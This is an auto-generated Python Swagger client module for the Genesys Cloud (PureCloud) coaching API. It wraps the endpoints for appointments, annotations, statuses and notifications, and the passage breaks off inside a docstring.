] | 1 | 2021-10-08T20:46:45.000Z | 2021-10-08T20:46:45.000Z | libs/PureCloudPlatformClientV2/apis/coaching_api.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | null | null | null | libs/PureCloudPlatformClientV2/apis/coaching_api.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
CoachingApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CoachingApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def delete_coaching_appointment(self, appointment_id, **kwargs):
"""
Delete an existing appointment
Permission not required if you are the creator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_coaching_appointment(appointment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:return: CoachingAppointmentReference
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_coaching_appointment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `delete_coaching_appointment`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentReference',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_coaching_appointment_annotation(self, appointment_id, annotation_id, **kwargs):
"""
Delete an existing annotation
You must have the appropriate permission for the type of annotation you are updating. Permission not required if you are the creator or facilitator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_coaching_appointment_annotation(appointment_id, annotation_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param str annotation_id: The ID of the annotation. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'annotation_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_coaching_appointment_annotation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `delete_coaching_appointment_annotation`")
# verify the required parameter 'annotation_id' is set
if ('annotation_id' not in params) or (params['annotation_id'] is None):
raise ValueError("Missing the required parameter `annotation_id` when calling `delete_coaching_appointment_annotation`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/annotations/{annotationId}'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
if 'annotation_id' in params:
path_params['annotationId'] = params['annotation_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointment(self, appointment_id, **kwargs):
"""
Retrieve an appointment
Permission not required if you are the attendee, creator or facilitator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointment(appointment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:return: CoachingAppointmentResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `get_coaching_appointment`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointment_annotation(self, appointment_id, annotation_id, **kwargs):
"""
Retrieve an annotation.
You must have the appropriate permission for the type of annotation you are creating. Permission not required if you are related to the appointment (only the creator or facilitator can view private annotations).
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointment_annotation(appointment_id, annotation_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param str annotation_id: The ID of the annotation. (required)
:return: CoachingAnnotation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'annotation_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointment_annotation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `get_coaching_appointment_annotation`")
# verify the required parameter 'annotation_id' is set
if ('annotation_id' not in params) or (params['annotation_id'] is None):
raise ValueError("Missing the required parameter `annotation_id` when calling `get_coaching_appointment_annotation`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/annotations/{annotationId}'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
if 'annotation_id' in params:
path_params['annotationId'] = params['annotation_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAnnotation',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointment_annotations(self, appointment_id, **kwargs):
"""
Get a list of annotations.
You must have the appropriate permission for the type of annotation you are creating. Permission not required if you are related to the appointment (only the creator or facilitator can view private annotations).
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointment_annotations(appointment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param int page_number: Page number
:param int page_size: Page size
:return: CoachingAnnotationList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'page_number', 'page_size']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointment_annotations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `get_coaching_appointment_annotations`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/annotations'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAnnotationList',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointment_statuses(self, appointment_id, **kwargs):
"""
Get the list of status changes for a coaching appointment.
Permission not required if you are an attendee, creator or facilitator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointment_statuses(appointment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param int page_number: Page number
:param int page_size: Page size
:return: CoachingAppointmentStatusResponseList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'page_number', 'page_size']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointment_statuses" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `get_coaching_appointment_statuses`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/statuses'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentStatusResponseList',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointments(self, user_ids, **kwargs):
"""
Get appointments for users and optional date range
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointments(user_ids, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] user_ids: The user IDs for which to retrieve appointments (required)
:param str interval: Interval to filter data by. End date is not inclusive. Intervals are represented as an ISO-8601 string. For example: YYYY-MM-DDThh:mm:ss/YYYY-MM-DDThh:mm:ss
:param int page_number: Page number
:param int page_size: Page size
:param list[str] statuses: Appointment Statuses to filter by
:param list[str] facilitator_ids: The facilitator IDs for which to retrieve appointments
:param str sort_order: Sort (by due date) either Asc or Desc
:param list[str] relationships: Relationships to filter by
:param str completion_interval: Appointment completion start and end to filter by. End date is not inclusive. Intervals are represented as an ISO-8601 string. For example: YYYY-MM-DDThh:mm:ss/YYYY-MM-DDThh:mm:ss
:param str overdue: Overdue status to filter by
:return: CoachingAppointmentResponseList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_ids', 'interval', 'page_number', 'page_size', 'statuses', 'facilitator_ids', 'sort_order', 'relationships', 'completion_interval', 'overdue']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_ids' is set
if ('user_ids' not in params) or (params['user_ids'] is None):
raise ValueError("Missing the required parameter `user_ids` when calling `get_coaching_appointments`")
resource_path = '/api/v2/coaching/appointments'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'user_ids' in params:
query_params['userIds'] = params['user_ids']
if 'interval' in params:
query_params['interval'] = params['interval']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'statuses' in params:
query_params['statuses'] = params['statuses']
if 'facilitator_ids' in params:
query_params['facilitatorIds'] = params['facilitator_ids']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
if 'relationships' in params:
query_params['relationships'] = params['relationships']
if 'completion_interval' in params:
query_params['completionInterval'] = params['completion_interval']
if 'overdue' in params:
query_params['overdue'] = params['overdue']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentResponseList',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointments_me(self, **kwargs):
"""
Get my appointments for a given date range
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointments_me(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str interval: Interval to filter data by. End date is not inclusive. Intervals are represented as an ISO-8601 string. For example: YYYY-MM-DDThh:mm:ss/YYYY-MM-DDThh:mm:ss
:param int page_number: Page number
:param int page_size: Page size
:param list[str] statuses: Appointment Statuses to filter by
:param list[str] facilitator_ids: The facilitator IDs for which to retrieve appointments
:param str sort_order: Sort (by due date) either Asc or Desc
:param list[str] relationships: Relationships to filter by
:param str completion_interval: Appointment completion start and end to filter by. End date is not inclusive. Intervals are represented as an ISO-8601 string. For example: YYYY-MM-DDThh:mm:ss/YYYY-MM-DDThh:mm:ss
:param str overdue: Overdue status to filter by
:return: CoachingAppointmentResponseList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['interval', 'page_number', 'page_size', 'statuses', 'facilitator_ids', 'sort_order', 'relationships', 'completion_interval', 'overdue']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointments_me" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/coaching/appointments/me'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'interval' in params:
query_params['interval'] = params['interval']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'statuses' in params:
query_params['statuses'] = params['statuses']
if 'facilitator_ids' in params:
query_params['facilitatorIds'] = params['facilitator_ids']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
if 'relationships' in params:
query_params['relationships'] = params['relationships']
if 'completion_interval' in params:
query_params['completionInterval'] = params['completion_interval']
if 'overdue' in params:
query_params['overdue'] = params['overdue']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentResponseList',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_notification(self, notification_id, **kwargs):
"""
Get an existing notification
Permission not required if you are the owner of the notification.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_notification(notification_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str notification_id: The ID of the notification. (required)
:param list[str] expand: Indicates a field in the response which should be expanded.
:return: CoachingNotification
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['notification_id', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_notification" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'notification_id' is set
if ('notification_id' not in params) or (params['notification_id'] is None):
raise ValueError("Missing the required parameter `notification_id` when calling `get_coaching_notification`")
resource_path = '/api/v2/coaching/notifications/{notificationId}'.replace('{format}', 'json')
path_params = {}
if 'notification_id' in params:
path_params['notificationId'] = params['notification_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingNotification',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_notifications(self, **kwargs):
"""
Retrieve the list of your notifications.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_notifications(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int page_number: Page number
:param int page_size: Page size
:param list[str] expand: Indicates a field in the response which should be expanded.
:return: CoachingNotificationList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_number', 'page_size', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_notifications" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/coaching/notifications'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingNotificationList',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def patch_coaching_appointment(self, appointment_id, body, **kwargs):
"""
Update an existing appointment
Permission not required if you are the creator or facilitator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_coaching_appointment(appointment_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param UpdateCoachingAppointmentRequest body: The new version of the appointment (required)
:return: CoachingAppointmentResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_coaching_appointment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `patch_coaching_appointment`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_coaching_appointment`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def patch_coaching_appointment_annotation(self, appointment_id, annotation_id, body, **kwargs):
"""
Update an existing annotation.
You must have the appropriate permission for the type of annotation you are updating. Permission not required if you are the creator or facilitator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_coaching_appointment_annotation(appointment_id, annotation_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param str annotation_id: The ID of the annotation. (required)
:param CoachingAnnotation body: The new version of the annotation (required)
:return: CoachingAnnotation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'annotation_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_coaching_appointment_annotation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `patch_coaching_appointment_annotation`")
# verify the required parameter 'annotation_id' is set
if ('annotation_id' not in params) or (params['annotation_id'] is None):
raise ValueError("Missing the required parameter `annotation_id` when calling `patch_coaching_appointment_annotation`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_coaching_appointment_annotation`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/annotations/{annotationId}'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
if 'annotation_id' in params:
path_params['annotationId'] = params['annotation_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAnnotation',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def patch_coaching_appointment_status(self, appointment_id, body, **kwargs):
"""
Update the status of a coaching appointment
Permission not required if you are an attendee, creator or facilitator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_coaching_appointment_status(appointment_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param CoachingAppointmentStatusRequest body: Updated status of the coaching appointment (required)
:return: CoachingAppointmentStatusResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_coaching_appointment_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `patch_coaching_appointment_status`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_coaching_appointment_status`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/status'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentStatusResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def patch_coaching_notification(self, notification_id, body, **kwargs):
"""
Update an existing notification.
Can only update your own notifications.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_coaching_notification(notification_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str notification_id: The ID of the notification. (required)
:param CoachingNotification body: Change the read state of a notification (required)
:return: CoachingNotification
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['notification_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_coaching_notification" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'notification_id' is set
if ('notification_id' not in params) or (params['notification_id'] is None):
raise ValueError("Missing the required parameter `notification_id` when calling `patch_coaching_notification`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_coaching_notification`")
resource_path = '/api/v2/coaching/notifications/{notificationId}'.replace('{format}', 'json')
path_params = {}
if 'notification_id' in params:
path_params['notificationId'] = params['notification_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingNotification',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_coaching_appointment_annotations(self, appointment_id, body, **kwargs):
"""
Create a new annotation.
You must have the appropriate permission for the type of annotation you are creating. Permission not required if you are related to the appointment (only the creator or facilitator can create private annotations).
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
